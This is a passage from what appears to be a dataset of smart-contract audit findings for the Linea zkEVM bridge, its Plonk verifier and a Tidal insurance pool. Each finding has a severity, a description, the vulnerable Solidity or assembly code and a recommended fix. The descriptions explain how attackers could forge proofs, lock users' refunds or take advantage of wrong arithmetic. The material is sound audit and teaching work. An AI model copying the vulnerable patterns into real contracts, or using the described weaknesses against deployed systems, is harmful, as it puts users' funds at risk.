as:\\n```\\nif (existingStatus == INBOX\\_STATUS\\_UNKNOWN) {\\n revert L1L2MessageNotSent(messageHash);\\n}\\n```\\n\\nHowever, the status is need to be checked with `OUTBOX_STATUS_UNKNOWN` instead of `INBOX_STATUS_UNKNOWN` as it is an outbox message. This creates a hindrance in the code readability and should be fixed.\\nArray `timestampHashes` stores `l2BlockTimestamp` as integers, contrary to the hashes that the variable name states.\\n```\\ntimestampHashes[i] = blockInfo.l2BlockTimestamp;\\n```\\n\\nUnused error declaration\\n```\\n \\* dev Thrown when the decoding action is invalid.\\n \\*/\\n\\nerror InvalidAction();\\n```\\n\\nTransactionDecoder defines an error as `InvalidAction` which is supposed to be thrown when the decoding action is invalid, as stated in NATSPEC comment. However, it is currently unutilized.","Only update the status for sent messages in `_updateL1L2MessageStatusToReceived`, and unknown messages in `addL1L2MessageHashes` and revert otherwise, to avoid off-chain accounting errors.\\nCheck the status of L1->L2 sent message with `OUTBOX_STATUS_UNKNOWN` to increase code readability.\\nEither store timestamp hashes in the variable `timestampHashes` or update the variable name likewise.\\nRemove the error declaration if it is not serving any purpose.",,```\\nfunction \\_updateL1L2MessageStatusToReceived(bytes32[] memory \\_messageHashes) internal {\\n uint256 messageHashArrayLength = \\_messageHashes.length;\\n\\n for (uint256 i; i < messageHashArrayLength; ) {\\n bytes32 messageHash = \\_messageHashes[i];\\n uint256 existingStatus = outboxL1L2MessageStatus[messageHash];\\n\\n if (existingStatus == INBOX\\_STATUS\\_UNKNOWN) {\\n revert L1L2MessageNotSent(messageHash);\\n }\\n\\n if (existingStatus != OUTBOX\\_STATUS\\_RECEIVED) {\\n outboxL1L2MessageStatus[messageHash] = OUTBOX\\_STATUS\\_RECEIVED;\\n }\\n\\n unchecked {\\n i++;\\n }\\n }\\n\\n emit L1L2MessagesReceivedOnL2(\\_messageHashes);\\n}\\n```\\n +TransactionDecoder Does Not Account 
for the Missing Elements While Decoding a Transaction,low,"The library tries to decode calldata from different transaction types, by jumping to the position of calldata element in the rlp encoding. These positions are:\\nEIP1559: 8\\nEIP2930: 7\\nLegacy: 6\\n```\\ndata = it.\\_skipTo(8).\\_toBytes();\\n```\\n\\n```\\ndata = it.\\_skipTo(7).\\_toBytes();\\n```\\n\\n```\\ndata = it.\\_skipTo(6).\\_toBytes();\\n```\\n\\nHowever, the decoder doesn't check whether the required element is there or not in the encoding provided.\\nThe decoder uses the library RLPReader to skip to the desired element in encoding. However, it doesn't revert in case there are not enough elements to skip to, and will simply return byte `0x00`, while still completing unnecessary iterations.\\n```\\nfunction \\_skipTo(Iterator memory \\_self, uint256 \\_skipToNum) internal pure returns (RLPItem memory item) {\\n uint256 ptr = \\_self.nextPtr;\\n uint256 itemLength = \\_itemLength(ptr);\\n \\_self.nextPtr = ptr + itemLength;\\n\\n for (uint256 i; i < \\_skipToNum - 1; ) {\\n ptr = \\_self.nextPtr;\\n itemLength = \\_itemLength(ptr);\\n \\_self.nextPtr = ptr + itemLength;\\n\\n unchecked {\\n i++;\\n }\\n }\\n\\n item.len = itemLength;\\n item.memPtr = ptr;\\n}\\n```\\n\\nAlthough it doesn't impose any security issue, as `ZkEvmV2` tries to decode an array of bytes32 hashes from the rlp encoded transaction. 
However, it may still lead to errors in other use cases if not handled correctly.\\n```\\nCodecV2.\\_extractXDomainAddHashes(TransactionDecoder.decodeTransaction(\\_transactions[\\_batchReceptionIndices[i]]))\\n```\\n",rlp library should revert if there are not enough elements to skip to in the encoding.,,```\\ndata = it.\\_skipTo(8).\\_toBytes();\\n```\\n +Incomplete Message State Check When Claiming Messages on L1 and L2,low,"When claiming message on L1 orL2, `_updateL2L1MessageStatusToClaimed` and `_updateL1L2MessageStatusToClaimed` are called to update the message status, however the message state check only checks status `INBOX_STATUS_RECEIVED` and is missing status `INBOX_STATUS_UNKNOWN`, which means the message is not picked up by the coordinator or the message is not sent on L1 or L2 and should be reverted. As a result, the claiming message could be reverted with a incorrect reason.\\n```\\nfunction \\_updateL2L1MessageStatusToClaimed(bytes32 \\_messageHash) internal {\\n if (inboxL2L1MessageStatus[\\_messageHash] != INBOX\\_STATUS\\_RECEIVED) {\\n revert MessageAlreadyClaimed();\\n }\\n\\n delete inboxL2L1MessageStatus[\\_messageHash];\\n\\n emit L2L1MessageClaimed(\\_messageHash);\\n}\\n```\\n\\n```\\n function \\_updateL1L2MessageStatusToClaimed(bytes32 \\_messageHash) internal {\\n if (inboxL1L2MessageStatus[\\_messageHash] != INBOX\\_STATUS\\_RECEIVED) {\\n revert MessageAlreadyClaimed();\\n }\\n\\n inboxL1L2MessageStatus[\\_messageHash] = INBOX\\_STATUS\\_CLAIMED;\\n\\n emit L1L2MessageClaimed(\\_messageHash);\\n }\\n}\\n```\\n",Add the missing status check and relevant revert reason for status `INBOX_STATUS_UNKNOWN`,,```\\nfunction \\_updateL2L1MessageStatusToClaimed(bytes32 \\_messageHash) internal {\\n if (inboxL2L1MessageStatus[\\_messageHash] != INBOX\\_STATUS\\_RECEIVED) {\\n revert MessageAlreadyClaimed();\\n }\\n\\n delete inboxL2L1MessageStatus[\\_messageHash];\\n\\n emit L2L1MessageClaimed(\\_messageHash);\\n}\\n```\\n +Events Which May 
Trigger False Alarms,low,"1- `PauseManager` allows `PAUSE_MANAGER_ROLE` to pause/unpause a type as:\\n```\\nfunction pauseByType(bytes32 \\_pauseType) external onlyRole(PAUSE\\_MANAGER\\_ROLE) {\\n pauseTypeStatuses[\\_pauseType] = true;\\n emit Paused(\\_msgSender(), \\_pauseType);\\n}\\n```\\n\\n```\\nfunction unPauseByType(bytes32 \\_pauseType) external onlyRole(PAUSE\\_MANAGER\\_ROLE) {\\n pauseTypeStatuses[\\_pauseType] = false;\\n emit UnPaused(\\_msgSender(), \\_pauseType);\\n}\\n```\\n\\nHowever, the functions don't check whether the given `_pauseType` has already been paused/unpaused or not and emits an event every time called. This may trigger false alarms for off-chain monitoring tools and may cause unnecessary panic.\\n2 - `RateLimitter` allows resetting the limit and used amount as:\\n```\\nfunction resetRateLimitAmount(uint256 \\_amount) external onlyRole(RATE\\_LIMIT\\_SETTER\\_ROLE) {\\n bool amountUsedLoweredToLimit;\\n\\n if (\\_amount < currentPeriodAmountInWei) {\\n currentPeriodAmountInWei = \\_amount;\\n amountUsedLoweredToLimit = true;\\n }\\n\\n limitInWei = \\_amount;\\n\\n emit LimitAmountChange(\\_msgSender(), \\_amount, amountUsedLoweredToLimit);\\n}\\n```\\n\\n```\\nfunction resetAmountUsedInPeriod() external onlyRole(RATE\\_LIMIT\\_SETTER\\_ROLE) {\\n currentPeriodAmountInWei = 0;\\n\\n emit AmountUsedInPeriodReset(\\_msgSender());\\n}\\n```\\n\\nHowever, it doesn't account for the scenarios where the function can be called after the current period ends and before a new period gets started. 
As the `currentPeriodAmountInWei` will still be holding the used amount of the last period, if the `RATE_LIMIT_SETTER_ROLE` tries to reset the limit with the lower value than the used amount, the function will emit the same event `LimitAmountChange` with the flag `amountUsedLoweredToLimit`.\\nAdding to it, the function will make `currentPeriodAmountInWei` = `limitInWei`, which means no more amount can be added as the used amount until the used amount is manually reset to 0, which points out to the fact that the used amount should be automatically reset, once the current period ends. Although it is handled automatically in function `_addUsedAmount`, however, if the new period has not yet started, it is supposed to be done in a 2-step approach i.e., first, reset the used amount and then the limit. It can be simplified by checking for the current period in the `resetRateLimitAmount` function itself.\\nThe same goes for the scenario where the used amount is reset after the current period ends. 
It will emit the same event as `AmountUsedInPeriodReset`\\nThese can create unnecessary confusion, as the events emitted don't consider the abovementioned scenarios.","Consider adding checks to make sure already paused/unpaused types don't emit respective events.\\nConsider emitting different events, or adding a flag in the events, that makes it easy to differentiate whether the limit and used amount are reset in the current period or after it has ended.\\nReset `currentPeriodAmountInWei` in function `resetRateLimitAmount` itself if the current period has ended.",,"```\\nfunction pauseByType(bytes32 \\_pauseType) external onlyRole(PAUSE\\_MANAGER\\_ROLE) {\\n pauseTypeStatuses[\\_pauseType] = true;\\n emit Paused(\\_msgSender(), \\_pauseType);\\n}\\n```\\n" +No Proper Trusted Setup Acknowledged,high,"Linea uses Plonk proof system, which needs a preprocessed CRS (Common Reference String) for proving and verification, the Plonk system security is based on the existence of a trusted setup ceremony to compute the CRS, the current verifier uses a CRS created by one single party, which requires fully trust of the party to delete the toxic waste (trapdoor) which can be used to generate forged proof, undermining the security of the entire system\\n```\\nuint256 constant g2\\_srs\\_0\\_x\\_0 = 11559732032986387107991004021392285783925812861821192530917403151452391805634;\\nuint256 constant g2\\_srs\\_0\\_x\\_1 = 10857046999023057135944570762232829481370756359578518086990519993285655852781;\\nuint256 constant g2\\_srs\\_0\\_y\\_0 = 4082367875863433681332203403145435568316851327593401208105741076214120093531;\\nuint256 constant g2\\_srs\\_0\\_y\\_1 = 8495653923123431417604973247489272438418190587263600148770280649306958101930;\\n\\nuint256 constant g2\\_srs\\_1\\_x\\_0 = 18469474764091300207969441002824674761417641526767908873143851616926597782709;\\nuint256 constant g2\\_srs\\_1\\_x\\_1 = 
17691709543839494245591259280773972507311536864513996659348773884770927133474;\\nuint256 constant g2\\_srs\\_1\\_y\\_0 = 2799122126101651639961126614695310298819570600001757598712033559848160757380;\\nuint256 constant g2\\_srs\\_1\\_y\\_1 = 3054480525781015242495808388429905877188466478626784485318957932446534030175;\\n```\\n",Conduct a proper MPC to generate CRS like the Powers of Tau MPC or use a trustworthy CRS generated by an exisiting audited trusted setup like Aztec's ignition,,```\\nuint256 constant g2\\_srs\\_0\\_x\\_0 = 11559732032986387107991004021392285783925812861821192530917403151452391805634;\\nuint256 constant g2\\_srs\\_0\\_x\\_1 = 10857046999023057135944570762232829481370756359578518086990519993285655852781;\\nuint256 constant g2\\_srs\\_0\\_y\\_0 = 4082367875863433681332203403145435568316851327593401208105741076214120093531;\\nuint256 constant g2\\_srs\\_0\\_y\\_1 = 8495653923123431417604973247489272438418190587263600148770280649306958101930;\\n\\nuint256 constant g2\\_srs\\_1\\_x\\_0 = 18469474764091300207969441002824674761417641526767908873143851616926597782709;\\nuint256 constant g2\\_srs\\_1\\_x\\_1 = 17691709543839494245591259280773972507311536864513996659348773884770927133474;\\nuint256 constant g2\\_srs\\_1\\_y\\_0 = 2799122126101651639961126614695310298819570600001757598712033559848160757380;\\nuint256 constant g2\\_srs\\_1\\_y\\_1 = 3054480525781015242495808388429905877188466478626784485318957932446534030175;\\n```\\n +Missing Verifying Paring Check Result,high,"In function `batch_verify_multi_points`, the SNARK paring check is done by calling paring pre-compile `let l_success := staticcall(sub(gas(), 2000),8,mPtr,0x180,0x00,0x20)` and the only the execution status is stored in the final success state (state_success), but the the paring check result which is stored in 0x00 is not stored and checked, which means if the paring check result is 0 (pairing check failed), the proof would still pass verification, e.g. 
invalid proof with incorrect proof element `proof_openings_selector_commit_api_at_zeta` would pass the paring check. As a result it breaks the SNARK paring verification.\\n```\\nlet l\\_success := staticcall(sub(gas(), 2000),8,mPtr,0x180,0x00,0x20)\\n// l\\_success := true\\nmstore(add(state, state\\_success), and(l\\_success,mload(add(state, state\\_success))))\\n```\\n\\nAnother example is, if either of the following is sent as a point at infinity or (0,0) as (x,y) co-ordinate:\\ncommitment to the opening proof polynomial Wz\\ncommitment to the opening proof polynomial Wzw\\nThe proof will still work, since the pairing result is not being checked.",Verify paring check result and store it in the final success state after calling the paring pre-compile,,"```\\nlet l\\_success := staticcall(sub(gas(), 2000),8,mPtr,0x180,0x00,0x20)\\n// l\\_success := true\\nmstore(add(state, state\\_success), and(l\\_success,mload(add(state, state\\_success))))\\n```\\n" +"Gas Greifing and Missing Return Status Check for staticcall(s), May Lead to Unexpected Outcomes Partially Addressed",high,"The gas supplied to the staticcall(s), is calculated by subtracting `2000` from the remaining gas at this point in time. However, if not provided enough gas, the staticcall(s) may fail and there will be no return data, and the execution will continue with the stale data that was previously there at the memory location specified by the return offset with the staticcall(s).\\n1- Predictable Derivation of Challenges\\nThe function `derive_gamma_beta_alpha_zeta` is used to derive the challenge values `gamma`, `beta`, `alpha`, `zeta`. These values are derived from the prover's transcript by hashing defined parameters and are supposed to be unpredictable by either the prover or the verifier. The hash is collected with the help of SHA2-256 precompile. 
The values are considered unpredictable, due to the assumption that SHA2-256 acts as a random oracle and it would be computationally infeasible for an attacker to find the pre-image of `gamma`. However, the assumption might be wrong.\\n```\\npop(staticcall(sub(gas(), 2000), 0x2, add(mPtr, 0x1b), size, mPtr, 0x20)) //0x1b -> 000..""gamma""\\n```\\n\\n```\\npop(staticcall(sub(gas(), 2000), 0x2, add(mPtr, 0x1c), 0x24, mPtr, 0x20)) //0x1b -> 000..""gamma""\\n```\\n\\n```\\npop(staticcall(sub(gas(), 2000), 0x2, add(mPtr, 0x1b), 0x65, mPtr, 0x20)) //0x1b -> 000..""gamma""\\n```\\n\\n```\\npop(staticcall(sub(gas(), 2000), 0x2, add(mPtr, 0x1c), 0xe4, mPtr, 0x20))\\n```\\n\\n```\\npop(staticcall(sub(gas(), 2000), 0x2, add(mPtr,start\\_input), size\\_input, add(state, state\\_gamma\\_kzg), 0x20))\\n```\\n\\nIf the staticcall(s) fails, it will make the challenge values to be predictable and may help the prover in forging proofs and launching other adversarial attacks.\\n2- Incorrect Exponentiation\\nFunctions `compute_ith_lagrange_at_z`, `compute_pi`, and `verify` compute modular exponentiation by making a `staticcall` to the precompile `modexp` as:\\n```\\npop(staticcall(sub(gas(), 2000),0x05,mPtr,0xc0,0x00,0x20))\\n```\\n\\n```\\npop(staticcall(sub(gas(), 2000),0x05,mPtr,0xc0,mPtr,0x20))\\n```\\n\\n```\\npop(staticcall(sub(gas(), 2000),0x05,mPtr,0xc0,mPtr,0x20))\\n```\\n\\nHowever, if not supplied enough gas, the staticcall(s) will fail, thus returning no result and the execution will continue with the stale data.\\n3. 
Incorrect Point Addition and Scalar Multiplication\\n```\\npop(staticcall(sub(gas(), 2000),7,folded\\_evals\\_commit,0x60,folded\\_evals\\_commit,0x40))\\n```\\n\\n```\\nlet l\\_success := staticcall(sub(gas(), 2000),6,mPtr,0x80,dst,0x40)\\n```\\n\\n```\\nlet l\\_success := staticcall(sub(gas(), 2000),7,mPtr,0x60,dst,0x40)\\n```\\n\\n```\\nlet l\\_success := staticcall(sub(gas(), 2000),7,mPtr,0x60,mPtr,0x40)\\n```\\n\\n```\\nl\\_success := and(l\\_success, staticcall(sub(gas(), 2000),6,mPtr,0x80,dst, 0x40))\\n```\\n\\nFor the same reason, `point_add`, `point_mul`, and `point_acc_mul` will return incorrect results. Matter of fact, `point_acc_mul` will not revert even if the scalar multiplication fails in the first step. Because, the memory location specified for the return offset, will still be containing the old (x,y) coordinates of `src`, which are points on the curve. Hence, it will proceed by incorrectly adding (x,y) coordinates of `dst` with it.\\nHowever, it will not be practically possible to conduct a gas griefing attack for staticcall(s) at the start of the top-level transaction. As it will require an attacker to pass a very low amount of gas to make the `staticcall` fail, but at the same time, that would not be enough to make the top-level transaction execute entirely and not run out of gas. But, this can still be conducted for the staticcall(s) that are executed at the near end of the top-level transaction.","Check the returned status of the staticcall and revert if any of the staticcall's return status has been 0.\\nAlso fix the comments mentioned for every staticcall, for instance: the function `derive_beta` says `0x1b -> 000..""gamma""` while the memory pointer holds the ASCII value of string `beta`",,"```\\npop(staticcall(sub(gas(), 2000), 0x2, add(mPtr, 0x1b), size, mPtr, 0x20)) //0x1b -> 000..""gamma""\\n```\\n" +Missing Scalar Field Range Check in Scalar Multiplication,high,"There is no field element range check on scalar field proof elements e.g. 
`proof_l_at_zeta, proof_r_at_zeta, proof_o_at_zeta, proof_s1_at_zeta,proof_s2_at_zeta, proof_grand_product_at_zeta_omega` as mentioned in the step 2 of the verifier's algorithm in the Plonk paper. The scalar multiplication functions `point_mul` and `point_acc_mul` call precompile ECMUL, according to EIP-169 , which would verify the point P is on curve and P.x and P.y is less than the base field modulus, however it doesn't check the scalar `s` is less than scalar field modulus, if `s` is greater than scalar field modulus `r_mod`, it would cause unintended behavior of the contract, specifically if the scalar field proof element `e` are replaced by `e` + `r_mod`, the proof would still pass verification. Although in Plonk's case, there is few attacker vectors could exists be based on this kind of proof malleability.\\n```\\nfunction point\\_mul(dst,src,s, mPtr) {\\n // let mPtr := add(mload(0x40), state\\_last\\_mem)\\n let state := mload(0x40)\\n mstore(mPtr,mload(src))\\n mstore(add(mPtr,0x20),mload(add(src,0x20)))\\n mstore(add(mPtr,0x40),s)\\n let l\\_success := staticcall(sub(gas(), 2000),7,mPtr,0x60,dst,0x40)\\n mstore(add(state, state\\_success), and(l\\_success,mload(add(state, state\\_success))))\\n}\\n\\n// dst <- dst + [s]src (Elliptic curve)\\nfunction point\\_acc\\_mul(dst,src,s, mPtr) {\\n let state := mload(0x40)\\n mstore(mPtr,mload(src))\\n mstore(add(mPtr,0x20),mload(add(src,0x20)))\\n mstore(add(mPtr,0x40),s)\\n let l\\_success := staticcall(sub(gas(), 2000),7,mPtr,0x60,mPtr,0x40)\\n mstore(add(mPtr,0x40),mload(dst))\\n mstore(add(mPtr,0x60),mload(add(dst,0x20)))\\n l\\_success := and(l\\_success, staticcall(sub(gas(), 2000),6,mPtr,0x80,dst, 0x40))\\n mstore(add(state, state\\_success), and(l\\_success,mload(add(state, state\\_success))))\\n}\\n```\\n",Add scalar field range check on scalar multiplication functions `point_mul` and `point_acc_mul` or the scalar field proof elements.,,"```\\nfunction point\\_mul(dst,src,s, mPtr) {\\n // let mPtr := 
add(mload(0x40), state\\_last\\_mem)\\n let state := mload(0x40)\\n mstore(mPtr,mload(src))\\n mstore(add(mPtr,0x20),mload(add(src,0x20)))\\n mstore(add(mPtr,0x40),s)\\n let l\\_success := staticcall(sub(gas(), 2000),7,mPtr,0x60,dst,0x40)\\n mstore(add(state, state\\_success), and(l\\_success,mload(add(state, state\\_success))))\\n}\\n\\n// dst <- dst + [s]src (Elliptic curve)\\nfunction point\\_acc\\_mul(dst,src,s, mPtr) {\\n let state := mload(0x40)\\n mstore(mPtr,mload(src))\\n mstore(add(mPtr,0x20),mload(add(src,0x20)))\\n mstore(add(mPtr,0x40),s)\\n let l\\_success := staticcall(sub(gas(), 2000),7,mPtr,0x60,mPtr,0x40)\\n mstore(add(mPtr,0x40),mload(dst))\\n mstore(add(mPtr,0x60),mload(add(dst,0x20)))\\n l\\_success := and(l\\_success, staticcall(sub(gas(), 2000),6,mPtr,0x80,dst, 0x40))\\n mstore(add(state, state\\_success), and(l\\_success,mload(add(state, state\\_success))))\\n}\\n```\\n" +Missing Public Inputs Range Check,high,"The public input is an array of `uint256` numbers, there is no check if each public input is less than SNARK scalar field modulus `r_mod`, as mentioned in the step 3 of the verifier's algorithm in the Plonk paper. Since public inputs are involved computation of `Pi` in the plonk gate which is in the SNARK scalar field, without the check, it might cause scalar field overflow and the verification contract would fail and revert. 
To prevent overflow and other unintended behavior there should be a range check for the public inputs.\\n```\\nfunction Verify(bytes memory proof, uint256[] memory public\\_inputs)\\n```\\n\\n```\\nsum\\_pi\\_wo\\_api\\_commit(add(public\\_inputs,0x20), mload(public\\_inputs), zeta)\\npi := mload(mload(0x40))\\n\\nfunction sum\\_pi\\_wo\\_api\\_commit(ins, n, z) {\\n let li := mload(0x40)\\n batch\\_compute\\_lagranges\\_at\\_z(z, n, li)\\n let res := 0\\n let tmp := 0\\n for {let i:=0} lt(i,n) {i:=add(i,1)}\\n {\\n tmp := mulmod(mload(li), mload(ins), r\\_mod)\\n res := addmod(res, tmp, r\\_mod)\\n li := add(li, 0x20)\\n ins := add(ins, 0x20)\\n }\\n mstore(mload(0x40), res)\\n}\\n```\\n","Add range check for the public inputs `require(input[i] < r_mod, ""public inputs greater than snark scalar field"");`",,"```\\nfunction Verify(bytes memory proof, uint256[] memory public\\_inputs)\\n```\\n" +Loading Arbitrary Data as Wire Commitments Acknowledged,medium,"Function `load_wire_commitments_commit_api` as the name suggests, loads wire commitments from the proof into the memory array `wire_commitments`. The array is made to hold 2 values per commitment or the size of the array is 2 * `vk_nb_commitments_commit_api`, which makes sense as these 2 values are the x & y co-ordinates of the commitments.\\n```\\nuint256[] memory wire\\_committed\\_commitments = new uint256[](2\\*vk\\_nb\\_commitments\\_commit\\_api);\\nload\\_wire\\_commitments\\_commit\\_api(wire\\_committed\\_commitments, proof);\\n```\\n\\nComing back to the functionload_wire_commitments_commit_api, it extracts both the x & y coordinates of a commitment in a single iteration. However, the loop runs `2 * vk_nb_commitments_commit_api`, or in other words, twice as many of the required iterations. For instance, if there is 1 commitment, it will run two times. The first iteration will pick up the actual coordinates and the second one can pick any arbitrary data from the proof(if passed) and load it into memory. 
Although, this data which has been loaded in an extra iteration seems harmless but still adds an overhead for the processing.\\n```\\nfor {let i:=0} lt(i, mul(vk\\_nb\\_commitments\\_commit\\_api,2)) {i:=add(i,1)}\\n```\\n","The number of iterations should be equal to the size of commitments, i.e., `vk_nb_commitments_commit_api`. So consider switching from:\\n```\\nfor {let i:=0} lt(i, mul(vk_nb_commitments_commit_api,2)) {i:=add(i,1)}\\n```\\n\\nto:\\n```\\nfor {let i:=0} lt(i, vk_nb_commitments_commit_api) {i:=add(i,1)}\\n```\\n",,"```\\nuint256[] memory wire\\_committed\\_commitments = new uint256[](2\\*vk\\_nb\\_commitments\\_commit\\_api);\\nload\\_wire\\_commitments\\_commit\\_api(wire\\_committed\\_commitments, proof);\\n```\\n" +Makefile: Target Order,low,"The target `all` in the Makefile ostensibly wants to run the targets `clean` and `solc` in that order.\\n```\\nall: clean solc\\n```\\n\\nHowever prerequisites in GNU Make are not ordered, and they might even run in parallel. In this case, this could cause spurious behavior like overwrite errors or files being deleted just after being created.",The Make way to ensure that targets run one after the other is\\n```\\nall: clean\\n $(MAKE) solc\\n```\\n\\nAlso `all` should be listed in the PHONY targets.,,```\\nall: clean solc\\n```\\n +addPremium - A back runner may cause an insurance holder to lose their refunds by calling addPremium right after the original call,high,"`addPremium` is a public function that can be called by anyone and that distributes the weekly premium payments to the pool manager and the rest of the pool share holders. If the collateral deposited is not enough to cover the total coverage offered to insurance holders for a given week, refunds are allocated pro rata for all insurance holders of that particular week and policy. 
However, in the current implementation, attackers can call `addPremium` right after the original call to `addPremium` but before the call to refund; this will cause the insurance holders to lose their refunds, which will be effectively locked forever in the contract (unless the contract is upgraded).\\n```\\nrefundMap[policyIndex\\_][week] = incomeMap[policyIndex\\_][week].mul(\\n allCovered.sub(maximumToCover)).div(allCovered);\\n```\\n",`addPremium` should contain a validation check in the beginning of the function that reverts for the case of `incomeMap[policyIndex_][week] = 0`.,,```\\nrefundMap[policyIndex\\_][week] = incomeMap[policyIndex\\_][week].mul(\\n allCovered.sub(maximumToCover)).div(allCovered);\\n```\\n +refund - attacker can lock insurance holder's refunds by calling refund before a refund was allocated,high,"`addPremium` is used to determine the `refund` amount that an insurance holder is eligible to claim. The amount is stored in the `refundMap` mapping and can then later be claimed by anyone on behalf of an insurance holder by calling `refund`. The `refund` function can't be called more than once for a given combination of `policyIndex_`, `week_`, and `who_`, as it would revert with an “Already refunded” error. 
This gives an attacker the opportunity to call `refund` on behalf of any insurance holder with value 0 inside the `refundMap`, causing any future `refund` allocated for that holder in a given week and for a given policy to be locked forever in the contract (unless the contract is upgraded).\\n```\\nfunction refund(\\n uint256 policyIndex\\_,\\n uint256 week\\_,\\n address who\\_\\n) external noReenter {\\n Coverage storage coverage = coverageMap[policyIndex\\_][week\\_][who\\_];\\n\\n require(!coverage.refunded, ""Already refunded"");\\n\\n uint256 allCovered = coveredMap[policyIndex\\_][week\\_];\\n uint256 amountToRefund = refundMap[policyIndex\\_][week\\_].mul(\\n coverage.amount).div(allCovered);\\n coverage.amount = coverage.amount.mul(\\n coverage.premium.sub(amountToRefund)).div(coverage.premium);\\n coverage.refunded = true;\\n\\n IERC20(baseToken).safeTransfer(who\\_, amountToRefund);\\n\\n if (eventAggregator != address(0)) {\\n IEventAggregator(eventAggregator).refund(\\n policyIndex\\_,\\n week\\_,\\n who\\_,\\n amountToRefund\\n );\\n }\\n}\\n```\\n",There should be a validation check at the beginning of the function that reverts if `refundMap[policyIndex_][week_] == 0`.,,"```\\nfunction refund(\\n uint256 policyIndex\\_,\\n uint256 week\\_,\\n address who\\_\\n) external noReenter {\\n Coverage storage coverage = coverageMap[policyIndex\\_][week\\_][who\\_];\\n\\n require(!coverage.refunded, ""Already refunded"");\\n\\n uint256 allCovered = coveredMap[policyIndex\\_][week\\_];\\n uint256 amountToRefund = refundMap[policyIndex\\_][week\\_].mul(\\n coverage.amount).div(allCovered);\\n coverage.amount = coverage.amount.mul(\\n coverage.premium.sub(amountToRefund)).div(coverage.premium);\\n coverage.refunded = true;\\n\\n IERC20(baseToken).safeTransfer(who\\_, amountToRefund);\\n\\n if (eventAggregator != address(0)) {\\n IEventAggregator(eventAggregator).refund(\\n policyIndex\\_,\\n week\\_,\\n who\\_,\\n amountToRefund\\n );\\n }\\n}\\n```\\n" 
+"addTidal, _updateUserTidal, withdrawTidal - wrong arithmetic calculations",high,"To further incentivize sellers, anyone - although it will usually be the pool manager - can send an arbitrary amount of the Tidal token to a pool, which is then supposed to be distributed proportionally among the share owners. There are several flaws in the calculations that implement this mechanism:\\nA. addTidal:\\n```\\npoolInfo.accTidalPerShare = poolInfo.accTidalPerShare.add(\\n amount\\_.mul(SHARE\\_UNITS)).div(poolInfo.totalShare);\\n```\\n\\nThis should be:\\n```\\npoolInfo.accTidalPerShare = poolInfo.accTidalPerShare.add(\\n amount\\_.mul(SHARE\\_UNITS).div(poolInfo.totalShare));\\n```\\n\\nNote the different parenthesization. Without SafeMath:\\n```\\npoolInfo.accTidalPerShare += amount\\_ \\* SHARE\\_UNITS / poolInfo.totalShare;\\n```\\n\\nB. _updateUserTidal:\\n```\\nuint256 accAmount = poolInfo.accTidalPerShare.add(\\n userInfo.share).div(SHARE\\_UNITS);\\n```\\n\\nThis should be:\\n```\\nuint256 accAmount = poolInfo.accTidalPerShare.mul(\\n userInfo.share).div(SHARE\\_UNITS);\\n```\\n\\nNote that `add` has been replaced with `mul`. Without SafeMath:\\n```\\nuint256 accAmount = poolInfo.accTidalPerShare \\* userInfo.share / SHARE\\_UNITS;\\n```\\n\\nC. withdrawTidal:\\n```\\nuint256 accAmount = poolInfo.accTidalPerShare.add(userInfo.share);\\n```\\n\\nAs in B, this should be:\\n```\\nuint256 accAmount = poolInfo.accTidalPerShare.mul(\\n userInfo.share).div(SHARE\\_UNITS);\\n```\\n\\nNote that `add` has been replaced with `mul` and that a division by `SHARE_UNITS` has been appended. Without SafeMath:\\n```\\nuint256 accAmount = poolInfo.accTidalPerShare \\* userInfo.share / SHARE\\_UNITS;\\n```\\n\\nAs an additional minor point, the division in `addTidal` will revert with a panic (0x12) if the number of shares in the pool is zero. This case could be handled more gracefully.",Implement the fixes described above. 
The versions without `SafeMath` are easier to read and should be preferred; see https://github.com/ConsensysDiligence/tidal-audit-2023-04/issues/20.,,```\\npoolInfo.accTidalPerShare = poolInfo.accTidalPerShare.add(\\n amount\\_.mul(SHARE\\_UNITS)).div(poolInfo.totalShare);\\n```\\n +claim - Incomplete and lenient implementation,high,"In the current version of the code, the `claim` function is lacking crucial input validation logic as well as required state changes. Most of the process is implemented in other contracts or off-chain at the moment and is therefore out of scope for this audit, but there might still be issues caused by potential errors in the process. Moreover, pool manager and committee together have unlimited ownership of the deposits and can essentially withdraw all collateral to any desired address.\\n```\\nfunction claim(\\n uint256 policyIndex\\_,\\n uint256 amount\\_,\\n address receipient\\_\\n) external onlyPoolManager {\\n```\\n","To ensure a more secure claiming process, we propose adding the following logic to the `claim` function:\\n`refund` should be called at the beginning of the `claim` flow, so that the recipient's true coverage amount will be used.\\n`policyIndex` should be added as a parameter to this function, so that `coverageMap` can be used to validate that the amount claimed on behalf of a recipient is covered.\\nThe payout amount should be subtracted in the `coveredMap` and `coverageMap` mappings.",,"```\\nfunction claim(\\n uint256 policyIndex\\_,\\n uint256 amount\\_,\\n address receipient\\_\\n) external onlyPoolManager {\\n```\\n" +buy - insurance buyers trying to increase their coverage amount will lose their previous coverage,high,"When a user is willing to `buy` insurance, he is required to specify the desired amount (denoted as amount_) and to pay the entire premium upfront. In return, he receives the ownership over an entry inside the `coverageMap` mapping. 
If a user calls the `buy` function more than once for the same policy and time frame, his entry in the `coverageMap` will not represent the accumulated amount that he paid for but only the last coverage amount, which means previous coverage will be lost forever (unless the contract is upgraded).\\n```\\nfor (uint256 w = fromWeek\\_; w < toWeek\\_; ++w) {\\n incomeMap[policyIndex\\_][w] =\\n incomeMap[policyIndex\\_][w].add(premium);\\n coveredMap[policyIndex\\_][w] =\\n coveredMap[policyIndex\\_][w].add(amount\\_);\\n\\n require(coveredMap[policyIndex\\_][w] <= maximumToCover,\\n ""Not enough to buy"");\\n\\n coverageMap[policyIndex\\_][w][\\_msgSender()] = Coverage({\\n amount: amount\\_,\\n premium: premium,\\n refunded: false\\n });\\n}\\n```\\n",The coverage entry that represents the user's coverage should not be overwritten but should hold the accumulated amount of coverage instead.,,"```\\nfor (uint256 w = fromWeek\\_; w < toWeek\\_; ++w) {\\n incomeMap[policyIndex\\_][w] =\\n incomeMap[policyIndex\\_][w].add(premium);\\n coveredMap[policyIndex\\_][w] =\\n coveredMap[policyIndex\\_][w].add(amount\\_);\\n\\n require(coveredMap[policyIndex\\_][w] <= maximumToCover,\\n ""Not enough to buy"");\\n\\n coverageMap[policyIndex\\_][w][\\_msgSender()] = Coverage({\\n amount: amount\\_,\\n premium: premium,\\n refunded: false\\n });\\n}\\n```\\n" +Several issues related to upgradeability of contracts,medium,"We did not find a proxy contract or factory in the repository, but the README contains the following information:\\ncode/README.md:L11\\n```\\nEvery Pool is a standalone smart contract. It is made upgradeable with OpenZeppelin's Proxy Upgrade 